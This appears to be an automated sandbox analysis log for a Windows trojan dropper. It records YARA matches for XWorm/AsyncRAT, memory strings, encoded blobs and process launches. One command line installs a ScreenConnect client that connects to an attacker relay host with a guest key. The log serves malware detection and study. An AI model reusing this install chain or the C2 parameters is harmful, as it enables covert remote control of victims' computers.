Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Binary or memory string: OriginalFilenameOutput.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000011.00000002.2475208265.000002B561400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000010.00000002.2484633040.000000001328E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 00000011.00000002.2475254375.000002B561413000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.17.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 00000011.00000002.2475340058.000002B56144A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1323106947.000002B561449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?cc31cda
Source: svchost.exe, 00000011.00000002.2474255889.000002B560479000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws
Source: svchost.exe, 00000011.00000002.2475021662.000002B560D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:sam
Source: svchost.exe, 00000011.00000003.1323106947.000002B561449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddre
Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.c
Source: svchost.exe, 00000011.00000003.1321774469.000002B560D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSe
Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#S
Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDfG
Source: XClient.exe, 00000002.00000002.1335713833.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.1335713833.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.1335713833.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, XClient.exe.0.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000010.00000002.2484633040.000000001328E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.4.dr, ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect.WindowsFileManager.exe.4.dr, ScreenConnect.WindowsBackstageShell.exe.4.dr, ScreenConnect.WindowsCredentialProvider.dll.4.dr, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: svchost.exe, 00000011.00000002.2474584572.000002B5604B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: svchost.exe, 00000011.00000002.2475021662.000002B560D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/
Source: svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475041602.000002B560D13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80600
Source: svchost.exe, 00000011.00000002.2475123863.000002B560D5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475041602.000002B560D13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 00000011.00000002.2475123863.000002B560D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicyrf
Source: svchost.exe, 00000011.00000002.2475123863.000002B560D5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475063659.000002B560D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475041602.000002B560D13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 00000011.00000002.2475147231.000002B560D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue

Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 5Q3MO7HER4QVrhh3m4LI7MNWRpF0DKBUqy.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, Ow6BsVeEzBRWzxUbuYY7ONsKmPONHuhWv4gl6rT1aeXX2ULcGN6.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, Ow6BsVeEzBRWzxUbuYY7ONsKmPONHuhWv4gl6rT1aeXX2ULcGN6.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, Ow6BsVeEzBRWzxUbuYY7ONsKmPONHuhWv4gl6rT1aeXX2ULcGN6.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ScreenConnect.Windows.dll.4.dr, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'

Source: ScreenConnect.WindowsBackstageShell.exe.4.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.4.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.4.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: XClient.exe.0.dr, aOY1LHkSxcz7bCNxQCW.cs	Base64 encoded string: 'uhHq/nkKN9PUkSLpEpV+q3pKOiMVBN5FKf95wBY7Ueo7xVtMWTdFLW0iDK2bGL2n', 'G3pye3hJBqK2+lwjsVf1Z1mBDlapcFqjm1PfemfTAVLAjNtnRdA4sijrNwDmO1L0', 'r1UHrTUrhxCQn0ooHIc+WTjEuIp+1j1vVM1efiWABxq0svTy4gtBssm5M0NTfMKq', 'khwFzxp58ZXDYXCI/j8ZjHcfZpne25POzCvPXC5/LZpjr3U7JbYZ4hsxMaE24rjL', 'ReHO87l8eQUqrzNDkj3w+RnglCqIr//Sdc6G1Ft++f7eBTuILpeQ4wyDk5Y0/p7N'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, aOY1LHkSxcz7bCNxQCW.cs	Base64 encoded string: 'uhHq/nkKN9PUkSLpEpV+q3pKOiMVBN5FKf95wBY7Ueo7xVtMWTdFLW0iDK2bGL2n', 'G3pye3hJBqK2+lwjsVf1Z1mBDlapcFqjm1PfemfTAVLAjNtnRdA4sijrNwDmO1L0', 'r1UHrTUrhxCQn0ooHIc+WTjEuIp+1j1vVM1efiWABxq0svTy4gtBssm5M0NTfMKq', 'khwFzxp58ZXDYXCI/j8ZjHcfZpne25POzCvPXC5/LZpjr3U7JbYZ4hsxMaE24rjL', 'ReHO87l8eQUqrzNDkj3w+RnglCqIr//Sdc6G1Ft++f7eBTuILpeQ4wyDk5Y0/p7N'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, aOY1LHkSxcz7bCNxQCW.cs	Base64 encoded string: 'uhHq/nkKN9PUkSLpEpV+q3pKOiMVBN5FKf95wBY7Ueo7xVtMWTdFLW0iDK2bGL2n', 'G3pye3hJBqK2+lwjsVf1Z1mBDlapcFqjm1PfemfTAVLAjNtnRdA4sijrNwDmO1L0', 'r1UHrTUrhxCQn0ooHIc+WTjEuIp+1j1vVM1efiWABxq0svTy4gtBssm5M0NTfMKq', 'khwFzxp58ZXDYXCI/j8ZjHcfZpne25POzCvPXC5/LZpjr3U7JbYZ4hsxMaE24rjL', 'ReHO87l8eQUqrzNDkj3w+RnglCqIr//Sdc6G1Ft++f7eBTuILpeQ4wyDk5Y0/p7N'

Source: XClient.exe.0.dr, tLU2VSaMPJVr9yYF210.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.0.dr, tLU2VSaMPJVr9yYF210.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.4.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.4.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.4.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, tLU2VSaMPJVr9yYF210.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, tLU2VSaMPJVr9yYF210.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, tLU2VSaMPJVr9yYF210.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, tLU2VSaMPJVr9yYF210.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.ClientService.dll.4.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Mutant created: \Sessions\1\BaseNamedObjects\9kW2CKASZhbPokU8k
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\BufgvcOijCZ3VRLV
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6468
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ex.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B83268768F730349AA78A07AA19DE1CB C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI41FF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5128828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D3F98F32885A6934CA959398DEA944C7
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 44FEF3726CF7825BD3EF7883E408F966 E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c="
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468
